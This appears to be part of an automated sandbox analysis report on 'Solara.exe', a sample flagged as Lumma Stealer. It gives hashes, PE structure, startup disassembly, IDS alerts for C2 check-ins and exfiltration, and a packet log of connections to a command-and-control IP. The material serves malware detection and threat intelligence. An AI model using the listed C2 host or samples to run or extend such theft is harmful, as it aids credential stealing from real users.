                                                                                                                                    738KZNfnzz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.165.185
                                                                                                                                    mDuCbT8LnH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                    • 172.67.165.185
                                                                                                                                    Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.165.185
                                                                                                                                    O53VxanH6A.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.165.185
                                                                                                                                    ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.165.185
                                                                                                                                    IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.165.185
                                                                                                                                    No context
                                                                                                                                    Process:C:\Users\user\Desktop\Solara.exe
                                                                                                                                    File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):14402
                                                                                                                                    Entropy (8bit):4.874636730022465
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:vlICCmV5fTMzsM3qlICCmV5fTMzsM3ip9guFx2rBhiLfmfU:vGCC+dMOGCC+dMY9guFx2rBo
                                                                                                                                    MD5:DF0EFD0545733561C6E165770FB3661C
                                                                                                                                    SHA1:0F3AD477176CF235C6C59EE2EB15D81DCB6178A8
                                                                                                                                    SHA-256:A434B406E97A2C892FA88C3975D8181EBEA62A8DA919C5221409E425DF50FD17
                                                                                                                                    SHA-512:3FF527435BC8BCF2640E0B64725CC0DB8A801D912698D4D94C44200529268B80AA7B59A2E2A2EA6C4621E09AA249AAA3583A8D90E4F5D7B68E0E6FFFEB759918
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:AcquireSRWLockExclusive..AcquireSRWLockShared..ActivateActCtx..ActivateActCtxWorker..AddAtomA..AddAtomW..AddConsoleAliasA..AddConsoleAliasW..AddDllDirectory..AddIntegrityLabelToBoundaryDescriptor..AddLocalAlternateComputerNameA..AddLocalAlternateComputerNameW..AddRefActCtx..AddRefActCtxWorker..AddResourceAttributeAce..AddSIDToBoundaryDescriptor..AddScopedPolicyIDAce..AddSecureMemoryCacheCallback..AddVectoredContinueHandler..AddVectoredExceptionHandler..AdjustCalendarDate..AllocConsole..AllocateUserPhysicalPages..AllocateUserPhysicalPagesNuma..AppPolicyGetClrCompat..AppPolicyGetCreateFileAccess..AppPolicyGetLifecycleManagement..AppPolicyGetMediaFoundationCodecLoading..AppPolicyGetProcessTerminationMethod..AppPolicyGetShowDeveloperDiagnostic..AppPolicyGetThreadInitializationType..AppPolicyGetWindowingModel..AppXGetOSMaxVersionTested..ApplicationRecoveryFinished..ApplicationRecoveryInProgress..AreFileApisANSI..AssignProcessToJobObject..AttachConsole..BackupRead..BackupSeek..BackupWrite..B
                                                                                                                                    File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                    Entropy (8bit):7.562861764583217
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                    File name:Solara.exe
                                                                                                                                    File size:565'288 bytes
                                                                                                                                    MD5:a58debbc1c1961456ca288898e937ffb
                                                                                                                                    SHA1:018e99304ae7b0d1fbae772daab0acd5afb5f3c6
                                                                                                                                    SHA256:08d7909a9758d3c8e1492e5f83721acb930300d182ec2877dbe59bddd251e602
                                                                                                                                    SHA512:cee95a96c4077e7cc6b37a98bc5cebcb680110b790b524a295cb82ea4b31868f5f0eca3be0bf9ef5ac2b8aeb1b1ca04b54f02d49df1f11f83cb1d0fe844daf79
                                                                                                                                    SSDEEP:12288:XYO6Dqzihouxpa+yWQWXkY239XFHs+9UAPisqZa2LQAnREO:IO6DThou2+yrj39XFD9fn0agQERt
                                                                                                                                    TLSH:33C4D0523690C4B2D9531A765A79D7795A3EF8200F625ACBA3940BFDCE703C14F30A6E
                                                                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ng..........................................@.......................................@.................................|j..<..
                                                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                                                    Entrypoint:0x4104a0
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:true
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows cui
                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0x676E98E6 [Fri Dec 27 12:09:10 2024 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:6
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:6
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:6
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:96d90e8808da099bc17e050394f447e7
                                                                                                                                    Signature Valid:false
                                                                                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                    Error Number:-2146869232
                                                                                                                                    Not Before, Not After
                                                                                                                                    • 12/01/2023 19:00:00 16/01/2026 18:59:59
                                                                                                                                    Subject Chain
                                                                                                                                    • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                                                    Version:3
                                                                                                                                    Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                                                    Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                                                    Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                                                    Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                                                                                                    Instruction
                                                                                                                                    call 00007F55C0F1899Ah
                                                                                                                                    jmp 00007F55C0F187FDh
                                                                                                                                    mov ecx, dword ptr [0043B680h]
                                                                                                                                    push esi
                                                                                                                                    push edi
                                                                                                                                    mov edi, BB40E64Eh
                                                                                                                                    mov esi, FFFF0000h
                                                                                                                                    cmp ecx, edi
                                                                                                                                    je 00007F55C0F18996h
                                                                                                                                    test esi, ecx
                                                                                                                                    jne 00007F55C0F189B8h
                                                                                                                                    call 00007F55C0F189C1h
                                                                                                                                    mov ecx, eax
                                                                                                                                    cmp ecx, edi
                                                                                                                                    jne 00007F55C0F18999h
                                                                                                                                    mov ecx, BB40E64Fh
                                                                                                                                    jmp 00007F55C0F189A0h
                                                                                                                                    test esi, ecx
                                                                                                                                    jne 00007F55C0F1899Ch
                                                                                                                                    or eax, 00004711h
                                                                                                                                    shl eax, 10h
                                                                                                                                    or ecx, eax
                                                                                                                                    mov dword ptr [0043B680h], ecx
                                                                                                                                    not ecx
                                                                                                                                    pop edi
                                                                                                                                    mov dword ptr [0043B6C0h], ecx
                                                                                                                                    pop esi
                                                                                                                                    ret
                                                                                                                                    push ebp
                                                                                                                                    mov ebp, esp
                                                                                                                                    sub esp, 14h
                                                                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                                                                    xorps xmm0, xmm0
                                                                                                                                    push eax
                                                                                                                                    movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                    call dword ptr [00436D00h]
                                                                                                                                    mov eax, dword ptr [ebp-08h]
                                                                                                                                    xor eax, dword ptr [ebp-0Ch]
                                                                                                                                    mov dword ptr [ebp-04h], eax
                                                                                                                                    call dword ptr [00436CB8h]
                                                                                                                                    xor dword ptr [ebp-04h], eax
                                                                                                                                    call dword ptr [00436CB4h]
                                                                                                                                    xor dword ptr [ebp-04h], eax
                                                                                                                                    lea eax, dword ptr [ebp-14h]
                                                                                                                                    push eax
                                                                                                                                    call dword ptr [00436D50h]
                                                                                                                                    mov eax, dword ptr [ebp-10h]
                                                                                                                                    lea ecx, dword ptr [ebp-04h]
                                                                                                                                    xor eax, dword ptr [ebp-14h]
                                                                                                                                    xor eax, dword ptr [ebp-04h]
                                                                                                                                    xor eax, ecx
                                                                                                                                    leave
                                                                                                                                    ret
                                                                                                                                    mov eax, 00004000h
                                                                                                                                    ret
                                                                                                                                    push 0043CF48h
                                                                                                                                    call dword ptr [00436D28h]
                                                                                                                                    ret
                                                                                                                                    push 00030000h
                                                                                                                                    push 00010000h
                                                                                                                                    push 00000000h
                                                                                                                                    call 00007F55C0F1F773h
                                                                                                                                    add esp, 0Ch
                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x36a7c0x3c.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x8d0000x3fc.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x87a000x2628.bss
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x3f0000x2744.reloc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x326080x18.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ea980xc0.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x36c3c0x184.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x10000x2b4ca0x2b600ebf84c6b836020b1a66433a898baeab7False0.5443702719740634data6.596404756541432IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rdata0x2d0000xc50c0xc60096e76e7ef084461591b1dcd4c2131f05False0.40260022095959597data4.741850626178578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .data0x3a0000x37140x2800d87fd4546a2b39263a028b496b33108fFalse0.29814453125data5.024681407682101IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .tls0x3e0000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .reloc0x3f0000x27440x2800c7508b57e36483307c47b7dd73fc0c85False0.75166015625data6.531416896423856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                    .bss0x420000x4a2000x4a200a5e67897cabd609a43ba9f1a15160029False1.0003326570404723data7.999352798586712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .rsrc0x8d0000x3fc0x4006a4851071664eb0d5787860b0928a2faFalse0.4443359375data3.391431520369637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                    RT_VERSION0x8d0580x3a4dataEnglishUnited States0.44849785407725323
                                                                                                                                    DLLImport
                                                                                                                                    KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                    USER32.dllShowWindow
                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                    EnglishUnited States
                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                    2024-12-27T16:20:58.059815+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.165.185443TCP
                                                                                                                                    2024-12-27T16:20:58.825403+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449733172.67.165.185443TCP
                                                                                                                                    2024-12-27T16:20:58.825403+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733172.67.165.185443TCP
                                                                                                                                    2024-12-27T16:21:00.150427+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.165.185443TCP
                                                                                                                                    2024-12-27T16:21:00.929153+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449734172.67.165.185443TCP
                                                                                                                                    2024-12-27T16:21:00.929153+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449734172.67.165.185443TCP
                                                                                                                                    2024-12-27T16:21:02.536177+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.165.185443TCP
                                                                                                                                    2024-12-27T16:21:04.940094+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736172.67.165.185443TCP
                                                                                                                                    2024-12-27T16:21:07.237305+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.165.185443TCP
                                                                                                                                    2024-12-27T16:21:09.801267+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738172.67.165.185443TCP
                                                                                                                                    2024-12-27T16:21:12.337000+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739172.67.165.185443TCP
                                                                                                                                    2024-12-27T16:21:12.351028+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449739172.67.165.185443TCP
                                                                                                                                    2024-12-27T16:21:16.149908+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.165.185443TCP
                                                                                                                                    2024-12-27T16:21:16.932910+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449741172.67.165.185443TCP
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Dec 27, 2024 16:20:56.781799078 CET49733443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:20:56.781832933 CET44349733172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:20:56.781908989 CET49733443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:20:56.784878969 CET49733443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:20:56.784895897 CET44349733172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:20:58.059726954 CET44349733172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:20:58.059814930 CET49733443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:20:58.063349962 CET49733443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:20:58.063360929 CET44349733172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:20:58.063777924 CET44349733172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:20:58.112401962 CET49733443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:20:58.112421036 CET49733443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:20:58.112593889 CET44349733172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:20:58.825508118 CET44349733172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:20:58.825778008 CET44349733172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:20:58.825848103 CET49733443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:20:58.827188969 CET49733443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:20:58.827203035 CET44349733172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:20:58.827214003 CET49733443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:20:58.827219009 CET44349733172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:20:58.835758924 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:20:58.835833073 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:20:58.835918903 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:20:58.837038040 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:20:58.837066889 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.150324106 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.150427103 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:00.151753902 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:00.151786089 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.152295113 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.153512955 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:00.153574944 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:00.153613091 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.929269075 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.929397106 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.929465055 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:00.929505110 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.929533958 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.929595947 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:00.929621935 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.929773092 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.929826021 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:00.929851055 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.937208891 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.937272072 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:00.937288046 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.945374012 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.945432901 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:00.945449114 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:00.990185022 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:00.990201950 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:01.037050962 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:01.048554897 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:01.099654913 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:01.139307976 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:01.142762899 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:01.142833948 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:01.142852068 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:01.143069983 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:01.143131018 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:01.143225908 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:01.143260956 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:01.143287897 CET49734443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:01.143301010 CET44349734172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:01.269104004 CET49735443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:01.269150972 CET44349735172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:01.269220114 CET49735443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:01.269489050 CET49735443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:01.269504070 CET44349735172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:02.536092043 CET44349735172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:02.536176920 CET49735443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:02.537811041 CET49735443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:02.537822962 CET44349735172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:02.538610935 CET44349735172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:02.539885998 CET49735443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:02.540028095 CET49735443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:02.540066004 CET44349735172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:02.540132046 CET49735443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:02.540139914 CET44349735172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:03.593235970 CET44349735172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:03.593514919 CET44349735172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:03.593584061 CET49735443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:03.593703032 CET49735443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:03.593719959 CET44349735172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:03.671684980 CET49736443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:03.671717882 CET44349736172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:03.671809912 CET49736443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:03.672075033 CET49736443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:03.672091007 CET44349736172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:04.939976931 CET44349736172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:04.940093994 CET49736443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:04.941248894 CET49736443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:04.941258907 CET44349736172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:04.941750050 CET44349736172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:04.942786932 CET49736443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:04.942930937 CET49736443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:04.942962885 CET44349736172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:05.793451071 CET44349736172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:05.793715954 CET44349736172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:05.793772936 CET49736443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:05.793874025 CET49736443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:05.793890953 CET44349736172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:05.967192888 CET49737443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:05.967272043 CET44349737172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:05.967354059 CET49737443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:05.967685938 CET49737443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:05.967709064 CET44349737172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:07.237096071 CET44349737172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:07.237304926 CET49737443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:07.238504887 CET49737443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:07.238528967 CET44349737172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:07.239283085 CET44349737172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:07.240672112 CET49737443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:07.240833998 CET49737443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:07.240856886 CET44349737172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:07.240923882 CET49737443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:07.240931988 CET44349737172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:08.237591028 CET44349737172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:08.237823963 CET44349737172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:08.237900972 CET49737443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:08.237982035 CET49737443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:08.238007069 CET44349737172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:08.579870939 CET49738443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:08.579916954 CET44349738172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:08.579981089 CET49738443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:08.583327055 CET49738443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:08.583347082 CET44349738172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:09.801204920 CET44349738172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:09.801266909 CET49738443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:09.802520037 CET49738443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:09.802532911 CET44349738172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:09.802856922 CET44349738172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:09.804114103 CET49738443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:09.804208994 CET49738443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:09.804215908 CET44349738172.67.165.185192.168.2.4
